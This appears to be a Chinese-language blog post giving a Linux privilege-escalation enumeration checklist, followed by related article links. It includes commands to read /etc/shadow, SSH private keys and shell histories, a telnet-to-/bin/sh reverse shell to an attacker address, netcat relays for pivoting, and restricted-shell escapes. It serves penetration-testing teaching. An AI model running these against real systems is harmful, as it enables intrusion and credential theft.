基於Linux許可權提升的資訊收集
作業系統
什麼是發行型別?什麼版本的?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
什麼是核心版本?是64位嗎?
cat /proc/version
uname -a uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
從環境變數中可以收集到什麼資訊?環境變數中可能存在密碼或API金鑰
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env set
路徑(Path)
如果您對該變數內的任何資料夾都具有寫許可權,則可以劫持某些庫或二進位制
檔案:PATH
echo $ PATH**
有印表機嗎?**
lpstat -a
應用與服務
哪些服務正在執行?哪個服務具有哪個使用者特權?
ps aux
ps -ef top
cat /etc/services
root正在執行哪些服務?在這些易受攻擊的服務中,值得仔細檢查!
ps aux | grep root ps -ef | grep root
安裝了哪些應用程式?他們是什麼版本的?他們目前在執行嗎?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
服務設定是否配置錯誤?是否附有(脆弱的)外掛?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
計劃了哪些工作?(計劃任務)
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
是否有純文字使用者名稱和/或密碼?
- 檢查Web伺服器連線到資料庫的檔案(config.php或類似檔案)
- 檢查資料庫以獲取可能被重用的管理員密碼
- 檢查弱密碼
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
通訊與網路
系統具有哪些NIC?它是否連線到另一個網路?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
什麼是網路配置設定?我們可以找到關於該網路的哪些資訊?DHCP服務
器?DNS伺服器?閘道器?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
快取了什麼?IP和/或MAC地址
arp -e
route
/sbin/route -nee
資料包嗅探是否可能?可以看到什麼?
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
我們有shell嗎?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445
是否可以進行埠轉發?重定向流量並與之互動
注意:FPipe.exe -l [本地埠] -r [遠端埠] -s [本地埠] [本地IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
注意:ssh-[L / R] [本地埠]:[遠端IP]:[遠端埠] [本地使用者] @ [本地IP]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
注意:mknod backpipe p; nc -l -p [遠端埠] <backpipe | nc [本地IP] [本地 埠]> backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe
可以使用隧道嗎?在本地遠端傳送命令
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
機密資訊和使用者
id
who
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd |
awk -F: '$3 == 0 { print $1}'
cat /etc/sudoers
sudo -l
可以找到哪些敏感檔案?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
home/root目錄有什麼“有用”的地方嗎?如果可以訪問
ls -ahlR /root/
ls -ahlR /home/
裡面有密碼嗎?指令碼,資料庫,配置檔案還是日誌檔案?密碼的預設路徑和
位置
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
使用者正在做什麼?是否有純文字密碼?他們在編輯什麼?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
可以找到哪些使用者資訊?
cat ~/.bashrc cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
可以找到私鑰資訊嗎?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
檔案系統
可以在/ etc /中寫入哪些配置檔案?能夠重新配置服務?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
在/ var /中可以找到什麼?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
網站上是否有任何設定/檔案(隱藏)?有資料庫資訊的任何設定檔案嗎?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
日誌檔案中是否有任何內容(可以幫助“本地檔案包含”!)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
如果命令受到限制,我們得跳出“受到限制”外殼嗎?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
是否存在安裝檔案系統?
mount
df -h
是否有任何解除安裝的檔案系統?
cat /etc/fstab
可以在哪裡寫入和執行?一些“常見”位置:/ tmp,/ var / tmp,/ dev /
shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
任何“問題”檔案嗎?Word可寫的“沒人”檔案
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
find /dir -xdev \( -nouser -o -nogroup \) -print
準備和查詢漏洞利用程式碼
安裝/支援哪些開發工具/語言?
find / -name perl*
find / -name python*
find / -name gcc* find / -name cc
如何上傳檔案?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
系統是否已完全打補丁?
核心,作業系統,所有應用程式,其外掛和Web服務
人生漫漫其修遠兮,網安無止境。
一同前行,加油!
相關文章
- Metasploit之後滲透攻擊(資訊收集、許可權提升)
- React基於RBAC的許可權控制React
- casbin基於golang的許可權控制Golang
- 基本Linux許可權提升(Basic Linux Privilege Escalation)Linux
- Guest許可權突破——許可權提升方法總結(轉)
- 基於casbin的RBAC許可權實踐
- 基於RBAC的許可權管理系統
- 基於 PHP 反射的許可權匯入PHP反射
- 基於RBAC的許可權設計模型模型
- 許可權系統概要(收集,整理)
- Linux-許可權管理(ACL許可權)Linux
- linux 檔案許可權 s 許可權和 t 許可權解析Linux
- Linux基礎之許可權管理Linux
- 基於RBAC實現許可權管理
- 利用PATH環境變數 - 提升linux許可權~?變數Linux
- 基於 PHP-Casbin 的 ABAC 許可權控制PHP
- 基於tp3.2.3開發的許可權管理系統,路由,微信,cdn,許可權路由
- Linux許可權Linux
- 許可權概念、許可權提升概念以及許可權提升的分類和目的 Windows 提權的基礎原理是瞭解作業系統的安全機制和許可權管理 Windows提權攻擊的進一步知識概念Windows作業系統
- Metasploit許可權提升全劇終
- 基於角色的許可權系統的問題
- Linux的許可權控制Linux
- Linux的檔案存取許可權和0644許可權Linux
- 柳大的Linux講義·基礎篇(3)許可權、連結與許可權管理Linux
- Windows環境下提升程式的許可權Windows
- Linux 許可權管理之目錄許可權限制Linux
- TP 基於選單的許可權控制CMS框架框架
- 基於vue(element ui) + ssm + shiro 的許可權VueUISSM
- Spring Security 基於URL的許可權判斷Spring
- 基於二進位制的許可權判斷
- Oracle的物件許可權、角色許可權、系統許可權Oracle物件
- 關於 Linux Polkit 許可權提升漏洞(CVE-2021-4034)的修復方法Linux
- Linux許可權控制Linux
- linux 許可權 chownLinux
- 許可權管理[Linux]Linux
- Linux ACL 許可權Linux
- Linux 特殊許可權Linux
- Docker安全:通過Docker提升許可權Docker